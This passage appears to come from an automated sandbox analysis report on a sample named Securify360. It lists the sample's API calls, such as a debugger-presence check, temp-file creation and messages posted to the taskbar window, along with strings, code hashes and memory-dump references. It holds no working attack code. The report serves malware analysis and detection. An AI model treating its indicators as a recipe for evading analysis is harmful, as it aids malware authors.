                                                                                              • Opcode Fuzzy Hash: 84e2d1ed8a37c1a690d53f55e67e80343c3994908c0cee07ecd1c95c5cbbfe1c
                                                                                              • Instruction Fuzzy Hash: 9501DBF6E46119A7CB20EBA5CE52EFF73AC9F12350F110019B88663252DA594E08B6B1
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName_wcscmp
                                                                                              • String ID: #32770
                                                                                              • API String ID: 2292705959-463685578
                                                                                              • Opcode ID: 46c412589b340353251ac4837520c48a36af20d3b449717056b800fcf668c104
                                                                                              • Instruction ID: 2091b359069735cdd488327f775d09708e593abe5994374e4b88f2dfda739efc
                                                                                              • Opcode Fuzzy Hash: 46c412589b340353251ac4837520c48a36af20d3b449717056b800fcf668c104
                                                                                              • Instruction Fuzzy Hash: 0FE0617290032C17D330995AAC49FA7F7ACEB04730F000017FD44D7001D560D90087D0
                                                                                              APIs
                                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00FE88A0
                                                                                                • Part of subcall function 00FB3588: _doexit.LIBCMT ref: 00FB3592
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message_doexit
                                                                                              • String ID: AutoIt$Error allocating memory.
                                                                                              • API String ID: 1993061046-4017498283
                                                                                              • Opcode ID: 8843e3e3ca7854327964215b9a379d2a48ba126387b6f54c2d34c13c445f9b96
                                                                                              • Instruction ID: 64071eba700110930d26aaf1239a54556a5ae70689bf0e95a6e7f4bba4478c25
                                                                                              • Opcode Fuzzy Hash: 8843e3e3ca7854327964215b9a379d2a48ba126387b6f54c2d34c13c445f9b96
                                                                                              • Instruction Fuzzy Hash: 95D02B723C035832C23031E6AC0BFCA7A488B45B90F20002AFB48BA0C38DDAA58052D5
                                                                                              APIs
                                                                                                • Part of subcall function 00FCB544: _memset.LIBCMT ref: 00FCB551
                                                                                                • Part of subcall function 00FB0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FCB520,?,?,?,00F9100A), ref: 00FB0B79
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,00F9100A), ref: 00FCB524
                                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F9100A), ref: 00FCB533
                                                                                              Strings
                                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FCB52E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                              • API String ID: 3158253471-631824599
                                                                                              • Opcode ID: dd2008aece29c17a5dc292600c9615cad7b7b8194dcbf403c73adaeea605759f
                                                                                              • Instruction ID: b119c4648b3492f48ac47c70e552178bb7ea52b85491808d3911991d10b7b2ed
                                                                                              • Opcode Fuzzy Hash: dd2008aece29c17a5dc292600c9615cad7b7b8194dcbf403c73adaeea605759f
                                                                                              • Instruction Fuzzy Hash: 63E06DB42003128FD330AF25E50AB427AE8AF44304F14891DE486CA349DB79D444DF91
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 00FD0091
                                                                                                • Part of subcall function 0100C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00FD027A,?), ref: 0100C6E7
                                                                                                • Part of subcall function 0100C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0100C6F9
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00FD0289
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                              • String ID: WIN_XPe
                                                                                              • API String ID: 582185067-3257408948
                                                                                              • Opcode ID: 710b97305b211688809e1eac46558030e81dcbeb0aa075d6266e8980d7ed1df9
                                                                                              • Instruction ID: 6b07041886a8fc463ba848ef80141b9a4dc072ab2a09ce8237ff38ac523240e7
                                                                                              • Opcode Fuzzy Hash: 710b97305b211688809e1eac46558030e81dcbeb0aa075d6266e8980d7ed1df9
                                                                                              • Instruction Fuzzy Hash: AFF03071804209EFDB25DF50D5587EC7BB8AB08300F280086E146A2184CB754F44EF20
                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00FF9EB5
                                                                                              • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00FF9ECC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Temp$FileNamePath
                                                                                              • String ID: aut
                                                                                              • API String ID: 3285503233-3010740371
                                                                                              • Opcode ID: ec06f8fe493dfba5100a5007e28d4bd61b0051aa0a3f3a623227c16ef9b770d9
                                                                                              • Instruction ID: eb6165e70540554082d7fcf29bb0122b93afa52c9004edbf5305213bd2919d2a
                                                                                              • Opcode Fuzzy Hash: ec06f8fe493dfba5100a5007e28d4bd61b0051aa0a3f3a623227c16ef9b770d9
                                                                                              • Instruction Fuzzy Hash: 03D05E7554030DABDB70AE90DC4EFDABB3CDB04700F1042A2BE9896096DA7595988BA1
                                                                                              APIs
                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 01015FAB
                                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 01015FBE
                                                                                                • Part of subcall function 00FF57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FF5877
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 529655941-2988720461
                                                                                              • Opcode ID: a66197ab93d5afdc33d27e0902cfcaba2d927be44a2a8a0f67029518356d4aa5
                                                                                              • Instruction ID: 4a7a6345d4273e76a08dee40142835405459bb9ff4deeb96808c84d4b98279c0
                                                                                              • Opcode Fuzzy Hash: a66197ab93d5afdc33d27e0902cfcaba2d927be44a2a8a0f67029518356d4aa5
                                                                                              • Instruction Fuzzy Hash: 4BD0C731384325B7E674BA749C4FF9779546F44B50F100425B795991D8C9F595008754
                                                                                              APIs
                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 01015FEB
                                                                                              • PostMessageW.USER32(00000000), ref: 01015FF2
                                                                                                • Part of subcall function 00FF57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FF5877
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 529655941-2988720461
                                                                                              • Opcode ID: 9ca6a6c34b85404fe15b020f648ccd1e5ef4bd0926223def7a3acf04a8ec7677
                                                                                              • Instruction ID: a562e010428e525cdffa5596424c2c4284d8eb4f885b10aa17aa9115b68ce04a
                                                                                              • Opcode Fuzzy Hash: 9ca6a6c34b85404fe15b020f648ccd1e5ef4bd0926223def7a3acf04a8ec7677
                                                                                              • Instruction Fuzzy Hash: 7AD0A932380324BBE234BA309C4FF973A10AB44B00F200828B396AA1C8C8F8A8008384